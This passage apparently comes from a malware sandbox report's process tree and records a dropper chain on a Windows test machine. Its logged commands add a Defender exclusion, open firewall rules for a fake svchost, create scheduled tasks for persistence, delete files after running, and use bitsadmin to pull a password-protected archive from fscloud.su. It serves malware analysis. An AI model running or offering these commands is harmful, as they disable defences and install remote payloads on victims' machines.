PID:3248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
7⤵
PID:7272

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
7⤵
PID:8160

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
7⤵
PID:7980

C:\Users\Admin\Pictures\Adobe Films\VIAFqhHGN6vGW6AC2Q5yfoYr.exe
"C:\Users\Admin\Pictures\Adobe Films\VIAFqhHGN6vGW6AC2Q5yfoYr.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:5028

C:\Users\Admin\Pictures\Adobe Films\eDiZ4D2V6widG4UWk7yPBh7R.exe
"C:\Users\Admin\Pictures\Adobe Films\eDiZ4D2V6widG4UWk7yPBh7R.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:388

C:\Users\Admin\Pictures\Adobe Films\OhCY_U9qjCDoxRO6LjrusrvX.exe
"C:\Users\Admin\Pictures\Adobe Films\OhCY_U9qjCDoxRO6LjrusrvX.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4408

C:\Users\Admin\Pictures\Adobe Films\UUVaP6vwQ16WWIFuMy_gPOOv.exe
"C:\Users\Admin\Pictures\Adobe Films\UUVaP6vwQ16WWIFuMy_gPOOv.exe"
6⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3936

C:\Users\Admin\Documents\FzzwDzPlAL9UZEBUFYd2MLsB.exe
"C:\Users\Admin\Documents\FzzwDzPlAL9UZEBUFYd2MLsB.exe"
7⤵
- Checks computer location settings
PID:3928

C:\Users\Admin\Pictures\Adobe Films\4R1suJMm_ensrXLXh8EfeBcG.exe
"C:\Users\Admin\Pictures\Adobe Films\4R1suJMm_ensrXLXh8EfeBcG.exe"
8⤵
PID:9544

C:\Users\Admin\Pictures\Adobe Films\K8Imundok69COSHZBCKnzYLA.exe
"C:\Users\Admin\Pictures\Adobe Films\K8Imundok69COSHZBCKnzYLA.exe" /mixtwo
8⤵
PID:5716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "K8Imundok69COSHZBCKnzYLA.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\K8Imundok69COSHZBCKnzYLA.exe" & exit
9⤵
PID:344

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "K8Imundok69COSHZBCKnzYLA.exe" /f
10⤵
- Kills process with taskkill
PID:5384

C:\Users\Admin\Pictures\Adobe Films\M5OEbtR68Nhc4IN3TRyoAffj.exe
"C:\Users\Admin\Pictures\Adobe Films\M5OEbtR68Nhc4IN3TRyoAffj.exe"
8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:9824

C:\Users\Admin\Pictures\Adobe Films\MNg2ze3YfsMyH3GM236E7XqF.exe
"C:\Users\Admin\Pictures\Adobe Films\MNg2ze3YfsMyH3GM236E7XqF.exe"
8⤵
PID:10040

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:8056

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:592

C:\Users\Admin\Pictures\Adobe Films\s2OeBmwuJhHiT0_Dx3151Hh7.exe
"C:\Users\Admin\Pictures\Adobe Films\s2OeBmwuJhHiT0_Dx3151Hh7.exe"
8⤵
PID:9112

C:\Users\Admin\Pictures\Adobe Films\cEaQIZJGRavuZtPoBg61zuXK.exe
"C:\Users\Admin\Pictures\Adobe Films\cEaQIZJGRavuZtPoBg61zuXK.exe"
8⤵
PID:10508

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
9⤵
PID:7120

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
10⤵
PID:7004

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x1f8,0x1f4,0x220,0x1f0,0x7ffdef52dec0,0x7ffdef52ded0,0x7ffdef52dee0
11⤵
PID:9008

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,4139988360837020487,4796445129930048928,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7004_1562920786" --mojo-platform-channel-handle=1676 /prefetch:8
11⤵
PID:14288

C:\Users\Admin\Pictures\Adobe Films\RHkZoZp8n1AK_4VKMRKpXwqZ.exe
"C:\Users\Admin\Pictures\Adobe Films\RHkZoZp8n1AK_4VKMRKpXwqZ.exe"
8⤵
PID:10984

C:\Users\Admin\AppData\Local\Temp\is-IO0ML.tmp\RHkZoZp8n1AK_4VKMRKpXwqZ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IO0ML.tmp\RHkZoZp8n1AK_4VKMRKpXwqZ.tmp" /SL5="$3062A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\RHkZoZp8n1AK_4VKMRKpXwqZ.exe"
9⤵
PID:11068

C:\Users\Admin\AppData\Local\Temp\is-6SUC4.tmp\ShareFolder.exe
"C:\Users\Admin\AppData\Local\Temp\is-6SUC4.tmp\ShareFolder.exe" /S /UID=2709
10⤵
PID:10312

C:\Program Files\Microsoft Office\ZQXRVWZTSS\foldershare.exe
"C:\Program Files\Microsoft Office\ZQXRVWZTSS\foldershare.exe" /VERYSILENT
11⤵
PID:7092

C:\Users\Admin\AppData\Local\Temp\27-f8e50-512-35ea0-c4b16a35e2591\Tashypaxaewy.exe
"C:\Users\Admin\AppData\Local\Temp\27-f8e50-512-35ea0-c4b16a35e2591\Tashypaxaewy.exe"
11⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\a9-1d3c2-8e2-432be-c319d4a35375d\Fehevazhyxa.exe
"C:\Users\Admin\AppData\Local\Temp\a9-1d3c2-8e2-432be-c319d4a35375d\Fehevazhyxa.exe"
11⤵
PID:10040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dub3iheh.tv5\GcleanerEU.exe /eufive & exit
12⤵
PID:3516

C:\Users\Admin\AppData\Local\Temp\dub3iheh.tv5\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\dub3iheh.tv5\GcleanerEU.exe /eufive
13⤵
PID:12776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dub3iheh.tv5\GcleanerEU.exe" & exit
14⤵
PID:10192

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "GcleanerEU.exe" /f
15⤵
- Kills process with taskkill
PID:13492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kovnldol.uz1\installer.exe /qn CAMPAIGN="654" & exit
12⤵
PID:12248

C:\Users\Admin\AppData\Local\Temp\kovnldol.uz1\installer.exe
C:\Users\Admin\AppData\Local\Temp\kovnldol.uz1\installer.exe /qn CAMPAIGN="654"
13⤵
PID:12888

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\kovnldol.uz1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\kovnldol.uz1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634417631 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
14⤵
PID:6124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohlos2iz.zzt\any.exe & exit
12⤵
PID:12292

C:\Users\Admin\AppData\Local\Temp\ohlos2iz.zzt\any.exe
C:\Users\Admin\AppData\Local\Temp\ohlos2iz.zzt\any.exe
13⤵
PID:13080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mmo5ets3.qbz\gcleaner.exe /mixfive & exit
12⤵
PID:12388

C:\Users\Admin\AppData\Local\Temp\mmo5ets3.qbz\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\mmo5ets3.qbz\gcleaner.exe /mixfive
13⤵
PID:13212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mmo5ets3.qbz\gcleaner.exe" & exit
14⤵
PID:14092

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
15⤵
- Kills process with taskkill
PID:5836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mt2vssa1.xfr\autosubplayer.exe /S & exit
12⤵
PID:12488

C:\Users\Admin\AppData\Local\Temp\mt2vssa1.xfr\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\mt2vssa1.xfr\autosubplayer.exe /S
13⤵
PID:12452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:13428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:5964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:12152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:3916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:6540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:11564

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
14⤵
- Download via BitsAdmin
PID:6432

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pDYE9fWUSbQZgKf8 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
14⤵
PID:11656

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppn3jQ1E291jN69N -y x C:\zip.7z -o"C:\Program Files\temp_files\"
14⤵
PID:13792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:14112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf7367.tmp\tempfile.ps1"
14⤵
PID:12672

C:\Users\Admin\Pictures\Adobe Films\kPJYXiK4JokzvF07Qt8MbeJR.exe
"C:\Users\Admin\Pictures\Adobe Films\kPJYXiK4JokzvF07Qt8MbeJR.exe"
8⤵
PID:11080

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:9796

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:9576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13a47d89c50.exe
4⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13a47d89c50.exe
Tue13a47d89c50.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4752 -s 1564
6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:7128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13530584f2459af.exe
4⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13530584f2459af.exe
Tue13530584f2459af.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5016

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13530584f2459af.exe
C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13530584f2459af.exe
6⤵
- Executes dropped EXE
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue132dd525eb51d2.exe
4⤵
PID:4444

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue132dd525eb51d2.exe
Tue132dd525eb51d2.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2004

C:\Users\Admin\Pictures\Adobe Films\jCyQvtoNcEF_HteCWStivjWV.exe
"C:\Users\Admin\Pictures\Adobe Films\jCyQvtoNcEF_HteCWStivjWV.exe"
6⤵
PID:196

C:\Users\Admin\Pictures\Adobe Films\Y0_SdSVbnDLkv9kTxFKq2yYi.exe
"C:\Users\Admin\Pictures\Adobe Films\Y0_SdSVbnDLkv9kTxFKq2yYi.exe"
6⤵
PID:7664

C:\Users\Admin\Pictures\Adobe Films\qMaxZyfrRyDDEoYOBts12TGA.exe
"C:\Users\Admin\Pictures\Adobe Films\qMaxZyfrRyDDEoYOBts12TGA.exe"
6⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7312

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:6140

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5104

C:\Users\Admin\Documents\k3XkRJE7kYvg6f6IKTC_1kVB.exe
"C:\Users\Admin\Documents\k3XkRJE7kYvg6f6IKTC_1kVB.exe"
7⤵
- Checks computer location settings
PID:7236

C:\Users\Admin\Pictures\Adobe Films\Nqz7zHf7JEi4o0NP_OacaBDB.exe
"C:\Users\Admin\Pictures\Adobe Films\Nqz7zHf7JEi4o0NP_OacaBDB.exe"
8⤵
PID:10124

C:\Users\Admin\Pictures\Adobe Films\q6AVMjRK92L4B3F_CSYxBcEE.exe
"C:\Users\Admin\Pictures\Adobe Films\q6AVMjRK92L4B3F_CSYxBcEE.exe" /mixtwo
8⤵
PID:700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "q6AVMjRK92L4B3F_CSYxBcEE.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\q6AVMjRK92L4B3F_CSYxBcEE.exe" & exit
9⤵
PID:8796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:7352

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "q6AVMjRK92L4B3F_CSYxBcEE.exe" /f
10⤵
- Kills process with taskkill
PID:12556

C:\Users\Admin\Pictures\Adobe Films\AXWfzJRh0nRovBABORxVf2WM.exe
"C:\Users\Admin\Pictures\Adobe Films\AXWfzJRh0nRovBABORxVf2WM.exe"
8⤵
PID:10308

C:\Users\Admin\Pictures\Adobe Films\hk2MMsJDjtnPW8MjHCEs1LYP.exe
"C:\Users\Admin\Pictures\Adobe Films\hk2MMsJDjtnPW8MjHCEs1LYP.exe"
8⤵
PID:10404

C:\Users\Admin\Pictures\Adobe Films\qA99uved2hk8uIE_K35KwOuR.exe
"C:\Users\Admin\Pictures\Adobe Films\qA99uved2hk8uIE_K35KwOuR.exe"
8⤵
PID:10432

C:\Users\Admin\Pictures\Adobe Films\ahEBwEdq8T9yRgBLSBusadU2.exe
"C:\Users\Admin\Pictures\Adobe Films\ahEBwEdq8T9yRgBLSBusadU2.exe"
8⤵
PID:10616

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
9⤵
PID:8544

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
10⤵
PID:13460

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffdef52dec0,0x7ffdef52ded0,0x7ffdef52dee0
11⤵
PID:14124

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0xa4,0x140,0x7ff7cd179e70,0x7ff7cd179e80,0x7ff7cd179e90
12⤵
PID:14168

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,8019853772850014945,1645909919526672512,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13460_50348012" --mojo-platform-channel-handle=1660 /prefetch:8
11⤵
PID:13388

C:\Users\Admin\Pictures\Adobe Films\WcBB5GUdJu1CEnSTwHbYx78v.exe
"C:\Users\Admin\Pictures\Adobe Films\WcBB5GUdJu1CEnSTwHbYx78v.exe"
8⤵
PID:9460

C:\Users\Admin\AppData\Local\Temp\is-JI3OK.tmp\WcBB5GUdJu1CEnSTwHbYx78v.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JI3OK.tmp\WcBB5GUdJu1CEnSTwHbYx78v.tmp" /SL5="$40310,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WcBB5GUdJu1CEnSTwHbYx78v.exe"
9⤵
PID:10204

C:\Users\Admin\AppData\Local\Temp\is-8ITEA.tmp\ShareFolder.exe
"C:\Users\Admin\AppData\Local\Temp\is-8ITEA.tmp\ShareFolder.exe" /S /UID=2709
10⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\4f-809c2-da3-67f84-4cd296660ed23\Qaweqaemaesae.exe
"C:\Users\Admin\AppData\Local\Temp\4f-809c2-da3-67f84-4cd296660ed23\Qaweqaemaesae.exe"
11⤵
PID:8924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\moyw2bip.bp3\GcleanerEU.exe /eufive & exit
12⤵
PID:12744

C:\Users\Admin\AppData\Local\Temp\moyw2bip.bp3\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\moyw2bip.bp3\GcleanerEU.exe /eufive
13⤵
PID:13236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\moyw2bip.bp3\GcleanerEU.exe" & exit
14⤵
PID:4736

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "GcleanerEU.exe" /f
15⤵
- Kills process with taskkill
PID:12528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oow3e0b0.0ru\installer.exe /qn CAMPAIGN="654" & exit
12⤵
PID:12920

C:\Users\Admin\AppData\Local\Temp\oow3e0b0.0ru\installer.exe
C:\Users\Admin\AppData\Local\Temp\oow3e0b0.0ru\installer.exe /qn CAMPAIGN="654"
13⤵
PID:5948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n2awu40e.soa\any.exe & exit
12⤵
PID:13104

C:\Users\Admin\AppData\Local\Temp\n2awu40e.soa\any.exe
C:\Users\Admin\AppData\Local\Temp\n2awu40e.soa\any.exe
13⤵
PID:10564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fsdvxv5y.1ka\gcleaner.exe /mixfive & exit
12⤵
PID:13300

C:\Users\Admin\AppData\Local\Temp\fsdvxv5y.1ka\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\fsdvxv5y.1ka\gcleaner.exe /mixfive
13⤵
PID:12440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\fsdvxv5y.1ka\gcleaner.exe" & exit
14⤵
PID:13448

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
15⤵
- Kills process with taskkill
PID:13568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxnuztce.chc\autosubplayer.exe /S & exit
12⤵
PID:10092

C:\Users\Admin\AppData\Local\Temp\yxnuztce.chc\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\yxnuztce.chc\autosubplayer.exe /S
13⤵
PID:12868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:14272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:12004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:4956

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
15⤵
PID:3856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:11532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:12072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:5916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:12864

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
14⤵
- Download via BitsAdmin
PID:14160

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pDYE9fWUSbQZgKf8 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
14⤵
PID:13932

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppn3jQ1E291jN69N -y x C:\zip.7z -o"C:\Program Files\temp_files\"
14⤵
PID:5740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:6604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:5960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:12160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:11240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB746.tmp\tempfile.ps1"
14⤵
PID:11700

C:\Users\Admin\Pictures\Adobe Films\0dDSJlZnQvkuK1VoxN97tHuc.exe
"C:\Users\Admin\Pictures\Adobe Films\0dDSJlZnQvkuK1VoxN97tHuc.exe"
8⤵
PID:10684

C:\Users\Admin\Pictures\Adobe Films\JQHhJMSb_HqRFhaAJ3fyhxBF.exe
"C:\Users\Admin\Pictures\Adobe Films\JQHhJMSb_HqRFhaAJ3fyhxBF.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:5968

C:\Users\Admin\Pictures\Adobe Films\H8mDPgJlNyEyJnfjqbA4GKMH.exe
"C:\Users\Admin\Pictures\Adobe Films\H8mDPgJlNyEyJnfjqbA4GKMH.exe"
6⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7856

C:\Users\Admin\Pictures\Adobe Films\MZebuESZgvLwRSXDPGqFrfuI.exe
"C:\Users\Admin\Pictures\Adobe Films\MZebuESZgvLwRSXDPGqFrfuI.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:7884

C:\Users\Admin\Pictures\Adobe Films\YUcpDvUwBIF2lNDBnMnNnkxO.exe
"C:\Users\Admin\Pictures\Adobe Films\YUcpDvUwBIF2lNDBnMnNnkxO.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:3588

C:\Users\Admin\Pictures\Adobe Films\kujVG5GGe2ek8fuaYQkw4LR5.exe
"C:\Users\Admin\Pictures\Adobe Films\kujVG5GGe2ek8fuaYQkw4LR5.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:7940

